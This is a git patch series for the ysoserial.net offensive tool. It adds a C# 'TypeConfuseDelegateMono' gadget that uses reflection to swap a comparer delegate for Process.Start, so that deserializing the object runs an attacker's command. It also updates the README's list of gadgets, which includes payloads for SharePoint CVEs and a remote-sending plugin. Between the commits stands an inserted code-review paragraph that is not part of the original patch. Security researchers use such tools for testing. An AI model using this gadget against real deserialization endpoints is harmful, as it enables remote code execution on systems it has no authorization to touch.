From 16d07ba146314d1e8f7ef761e6193baf4cb8e216 Mon Sep 17 00:00:00 2001 From: DoI <5291556+denandz@users.noreply.github.com> Date: Mon, 21 Oct 2019 21:34:44 +1300 Subject: [PATCH 1/2] Added Mono compatible TypeConfuseDelegate generator
--- .../TypeConfuseDelegateMonoGenerator.cs | 57 +++++++++++++++++++ ysoserial/ysoserial.csproj | 3 +- 2 files changed, 59 insertions(+), 1 deletion(-) create mode 100755 ysoserial/Generators/TypeConfuseDelegateMonoGenerator.cs
diff --git a/ysoserial/Generators/TypeConfuseDelegateMonoGenerator.cs b/ysoserial/Generators/TypeConfuseDelegateMonoGenerator.cs new file mode 100755
index 0000000..c595f26
--- /dev/null
+++ b/ysoserial/Generators/TypeConfuseDelegateMonoGenerator.cs 
@@ -0,0 +1,57 @@
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.IO;
+using System.Reflection;
+
+namespace ysoserial.Generators
+{
+ class TypeConfuseDelegateMonoGenerator : GenericGenerator
+ {
+ public override string Name()
+ {
+ return "TypeConfuseDelegateMono";
+ }
+
+ public override string Description()
+ {
+ return "TypeConfuseDelegate gadget by James Forshaw - Tweaked to work with Mono";
+ }
+
+ public override List SupportedFormatters()
+ {
+ return new List { "BinaryFormatter", "ObjectStateFormatter", "NetDataContractSerializer", "LosFormatter" };
+ }
+
+ public override object Generate(string cmd, string formatter, Boolean test)
+ {
+ return Serialize(TypeConfuseDelegateGadget(cmd), formatter, test);
+ }
+
+ /* this can be used easily by the plugins as well */
+ public object TypeConfuseDelegateGadget(string cmd)
+ {
+ if (File.Exists(cmd))
+ {
+ Console.Error.WriteLine("Reading command from file " + cmd + " ...");
+ cmd = File.ReadAllText(cmd);
+ }
+ Delegate da = new Comparison(String.Compare);
+ Comparison d = (Comparison)MulticastDelegate.Combine(da, da);
+ IComparer comp = Comparer.Create(d);
+ SortedSet set = new SortedSet(comp);
+ set.Add("cmd");
+ set.Add("/c " + cmd);
+
+ FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", BindingFlags.NonPublic | BindingFlags.Instance);
+ object[] invoke_list = d.GetInvocationList();
+ // Modify the invocation list to add Process::Start(string, string)
+ invoke_list[0] = new Func(Process.Start);
+ invoke_list[1] = new Func(Process.Start);
+ fi.SetValue(d, invoke_list);
+
+ return set;
+ }
+
+ }
+}
diff --git a/ysoserial/ysoserial.csproj b/ysoserial/ysoserial.csproj
index 147631f..a3391f7 100755
--- a/ysoserial/ysoserial.csproj
+++ b/ysoserial/ysoserial.csproj
@@ -88,6 +88,7 @@ +
@@ -118,4 +119,4 @@ --> - \ No newline at end of file + From fb52cf82dbcee54e9a6a1ce36b109ece52b86bfb Mon Sep 17 00:00:00 2001 
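Review bot: The new class never documents how it differs from the existing TypeConfuseDelegate generator — `Description()` says only "TypeConfuseDelegate gadget by James Forshaw - Tweaked to work with Mono", and `TypeConfuseDelegateGadget` has no header comment stating which step of the original does not work on Mono or what was changed, so a maintainer cannot tell the two generators apart without diffing them; a class-level `/// <summary>` naming the difference and the Mono version it was verified against would fix that. The reflection lookup `FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", ...)` is dereferenced at `fi.SetValue(d, invoke_list)` without a null check, so a runtime that names that private field differently fails with a NullReferenceException rather than a message naming the field that was expected. Minor style: `Boolean test` should be `bool test` and `invoke_list` should be `invokeList`, matching the camelCase of the other locals in the hunk. As rendered here the generic type arguments on `List`, `Comparison`, `Comparer`, `SortedSet` and `Func` appear to have been stripped, presumably by extraction, so I have not reviewed them.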
From: DoI <5291556+denandz@users.noreply.github.com> Date: Mon, 21 Oct 2019 21:47:48 +1300 Subject: [PATCH 2/2] Updated README.md
--- README.md | 23 +++++++++++++++++++---- 1 file changed, 19 insertions(+), 4 deletions(-)
diff --git a/README.md b/README.md
index 24fbbd0..ec89418 100644
--- a/README.md
+++ b/README.md
@@ -27,6 +27,13 @@ $ ./ysoserial -h ysoserial.net generates deserialization payloads for a variety of .NET formatters. Available formatters: + ActivitySurrogateDisableTypeCheck (ActivitySurrogateDisableTypeCheck Gadget by Nick Landers. Disables 4.8+ type protections for ActivitySurrogateSelector, command is ignored.) + Formatters: + BinaryFormatter + ObjectStateFormatter + SoapFormatter + NetDataContractSerializer + LosFormatter ActivitySurrogateSelectorFromFile (ActivitySurrogateSelector gadget by James Forshaw. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll'.) Formatters: BinaryFormatter
@@ -48,7 +55,7 @@ Available formatters: XmlSerializer DataContractSerializer YamlDotNet < 5.0.0 - TextFormattingRunProperties (TextFormattingRunProperties Gadget by Oleksandr Mirosh and Alvaro Munoz.) + TextFormattingRunProperties (TextFormattingRunProperties Gadget by Oleksandr Mirosh and Alvaro Munoz) Formatters: BinaryFormatter ObjectStateFormatter 
@@ -68,23 +75,31 @@ Available formatters: ObjectStateFormatter NetDataContractSerializer LosFormatter + TypeConfuseDelegateMono (TypeConfuseDelegate gadget by James Forshaw - Tweaked to work with Mono) + Formatters: + BinaryFormatter + ObjectStateFormatter + NetDataContractSerializer + LosFormatter WindowsIdentity (WindowsIdentity Gadget by Levi Broderick) Formatters: BinaryFormatter Json.Net DataContractSerializer + SoapFormatter Available plugins: - altserialization (Generates payload for HttpStaticObjectsCollection or SessionStateItemCollection) + ActivatorUrl (Sends a generated payload to an activated, presumably remote, object) + Altserialization (Generates payload for HttpStaticObjectsCollection or SessionStateItemCollection) ApplicationTrust (Generates XML payload for the ApplicationTrust class) Clipboard (Generates payload for DataObject and copy it into the clipboard - ready to be pasted in affected apps) DotNetNuke (Generates payload for DotNetNuke CVE-2017-9822) Resx (Generates RESX files) SessionSecurityTokenHandler (Generates XML payload for the SessionSecurityTokenHandler class) - SharePoint (Generates poayloads for SharePoint CVEs: CVE-2019-0604, CVE-2018-8421) + SharePoint (Generates poayloads for the following SharePoint CVEs: CVE-2019-0604, CVE-2018-8421) TransactionManagerReenlist (Generates payload for the TransactionManager.Reenlist method) ViewState (Generates a ViewState using known MachineKey parameters) - + Usage: ysoserial.exe [options] Options: -p, --plugin=VALUE the plugin to be used